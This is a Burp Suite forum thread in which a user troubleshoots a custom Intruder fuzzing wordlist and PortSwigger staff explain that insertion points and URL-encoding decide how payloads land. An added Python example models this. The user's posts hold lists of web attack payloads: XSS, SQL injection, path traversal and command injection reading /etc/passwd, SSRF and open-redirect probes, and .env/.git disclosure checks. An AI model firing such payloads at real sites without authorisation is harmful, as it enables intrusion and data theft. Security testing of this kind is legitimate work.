Burp Suite User Forum


file for FUZZ

olek | Last updated: Sep 07, 2022 06:16PM UTC

Hi Team, I would like to ask a trivial question. I created a file for Burp FUZZ, but I see the server usually does not respond. What am I doing wrong? A normal file from GitHub works well. Why does my file not work well when I fuzz a website? Is this a coding issue or what? I just open Notepad and put the payloads in, then load the file into Burp Intruder. But it does not work. Why?

do=uname-v ?func=ls ?arg=mc /\([^)]*\)|[\n\t]/g ?options=';alert(1)// ?load=hostname ..%2F..%2F/..;~x ?..%2F..%2F/..;~x ?menu=SELECT * FROM users WHERE id='1' OR 1=1-- ?uri=http://bing.com ?path=http://bing.com ?continue=http://bing.com ?url=http://bing.com ?site=../../../../../../../../../etc/passwd ?type=../../../../../../../../../etc/passwd

Hannah, PortSwigger Agent | Last updated: Sep 08, 2022 10:00AM UTC

Hi Olek,

Could you tell me the version of Burp you are using? Is your file a ".txt" file, or is it in a different format?

olek | Last updated: Sep 08, 2022 12:21PM UTC

This happens on all Burp versions. The format is normally txt.

Ben, PortSwigger Agent | Last updated: Sep 09, 2022 08:36AM UTC

Hi,

Just to clarify the situation, the issue that you are facing is that the Intruder attack is running but the payloads that you are inserting are not generating a response from the target site? Or is it the case that the responses being received are not what you are expecting?

Are you also able to answer the following:

What site are you trying to use the payloads on?
What request are you using as the base to carry out the attack?
What payload positions have you configured within this request?

Finally, what GitHub file are you using that works for you (and are you using the payloads in the GitHub file in exactly the same way as you are with your custom payloads, i.e. same base request, same payload positions etc.)?

olek | Last updated: Sep 09, 2022 01:58PM UTC

The server does not respond. I see "Error" is marked. No response from the server. This happens on all websites.

1. On all websites the situation is the same.
2. I just put the response into Intruder, mark some /x, put in the payload and run.
3. I showed you some samples above.

There are hundreds of websites where you can get payloads, for example https://github.com/danielmiessler/SecLists. I see these payloads have a different structure. One by one, but there are some with a list like my payload, for example SecLists.

My payload is like this:

?list_type="><script>alert(1)</script> ?url="",})</script><svg+onload=confirm(location)> ?terms=%22%22,})%3C/script%3E%3Csvg+onload=confirm(location)%3E ?categoryid="",})</script><svg+onload=confirm(location)> ?key="><script>alert(1)</script> ?l="><script>alert(1)</script> ?begindate="><script>alert(1)</script> ?enddate="><script>alert(1)</script> ?url=file:///etc/passwd?/../passwd ?file:${br}/et${u}c/pas${te}swd?/ ?file:///etc//passwd?#blahblahblah php?id="><img src=x onerror=alert(1)>263 ?login.asp::$DATA ?C:\Progra-1 ?calendar.aspx::$DATA ?login.aspx::$DATA ?api/geojson?url=file:/etc/passwd ?git/.config .env index.php?cmd=cat%20/etc/passwd ?cmd=cat%20/etc/passwd ?php?id=cat%20/etc/passwd

I do not know whether to use a question mark "?" at the beginning or not.

Hannah, PortSwigger Agent | Last updated: Sep 12, 2022 09:50AM UTC

Hi,

When you start your attack and look at the requests generated, are the payloads that you specified present? It looks like the payloads you are using probably want to be inserted on the path of the request, as the "?" signifies a query string in a URL. An example of this would be when using a search function on a website.

olek | Last updated: Sep 12, 2022 01:09PM UTC

Hannah, I see that in Community Edition it now works well. But in Burp Suite Professional, when I load the file into Intruder from a file, it does not work. But when I copy and paste, it works and the server responds to me. This is very strange.

Hannah, when Intruder runs, should I tick the option "URL-encode these characters" or not?

olek | Last updated: Sep 12, 2022 01:14PM UTC

Hannah, which version is the correct path?

?url=http://bing.com
url=http://bing.com
/?url=http://bing.com
/url=http://bing.com

Hannah, PortSwigger Agent | Last updated: Sep 13, 2022 08:40AM UTC

Hi,

Could you drop us an email at support@portswigger.net with some screenshots of your options in Community versus Professional? Could you also attach your diagnostics information (Help > Diagnostics) for your installation of Burp Suite Professional?

olek | Last updated: Sep 13, 2022 01:25PM UTC

Yes, but I do not have a license. Actually, I'm an unemployed person and I do not have enough money. I won some in bug bounty, but only 50$. When I win some, I will buy a license.

Hannah, PortSwigger Agent | Last updated: Sep 14, 2022 12:15PM UTC

Hi,

Our support service is free to all users of Burp, whether you use Community edition or have a license for Burp Suite Pro. If you're using Community Edition and you're finding that Intruder is too slow when using one thread, you can always check out the BApp Store extension "Turbo Intruder".

olek | Last updated: Sep 15, 2022 03:06PM UTC

Hannah, which version is the correct path?

?url=http://bing.com
url=http://bing.com
/?url=http://bing.com
/url=http://bing.com

Hannah, PortSwigger Agent | Last updated: Sep 16, 2022 03:22PM UTC

Hi Olek,

That will depend on where your insertion point is.

olek | Last updated: Sep 17, 2022 12:20PM UTC

Hannah, last question: when Intruder runs, should I tick the option "URL-encode these characters" or not?

Hannah, PortSwigger Agent | Last updated: Sep 20, 2022 09:58AM UTC

Hi Olek,

Unfortunately, again, this would depend on where your insertion point is or what the expected input is.
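
Why the answer depends on the insertion point, worked through for the four variants asked about above. This is an added example, not part of the thread and not PortSwigger code. The request targets in POSITIONS, the goal INTENDED and the helper names are assumptions, and the encoder is a simplified stand-in for a character-list URL-encoding option, not Burp's implementation.

```python
from urllib.parse import parse_qs

# Hypothetical base request targets; "§" marks the Intruder payload position.
POSITIONS = ["§", "/§", "/?§", "/?url=§"]
# The four payload variants asked about in the thread.
VARIANTS = ["?url=http://bing.com", "url=http://bing.com",
            "/?url=http://bing.com", "/url=http://bing.com"]
# Assumed goal: the server sees path "/" and one parameter, url=http://bing.com.
INTENDED = ("/", {"url": ["http://bing.com"]})


def url_encode_chars(payload, chars):
    """Percent-encode only the characters listed in `chars` (ASCII input)."""
    return "".join(f"%{ord(c):02X}" if c in chars else c for c in payload)


def what_server_sees(position, payload, encode_chars=""):
    """Return (path, params) for the resulting request target, or None when
    the request line is malformed (raw space, or target not starting with /)."""
    target = position.replace("§", url_encode_chars(payload, encode_chars))
    if " " in target or not target.startswith("/"):
        return None
    path, _, query = target.partition("?")
    return path, parse_qs(query, keep_blank_values=True)


def working_positions(payload, encode_chars=""):
    """Positions where the payload arrives as the intended `url` parameter."""
    return [p for p in POSITIONS
            if what_server_sees(p, payload, encode_chars) == INTENDED]


if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v!r:28} works at {working_positions(v)}")
    # Encoding '?' and '=' turns the delimiters into data, so nothing matches.
    print(working_positions("?url=http://bing.com", encode_chars="?="))
    # A raw space breaks the request line until it is encoded (constructed value).
    print(what_server_sees("/?q=§", "two words"))
    print(what_server_sees("/?q=§", "two words", encode_chars=" "))
```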
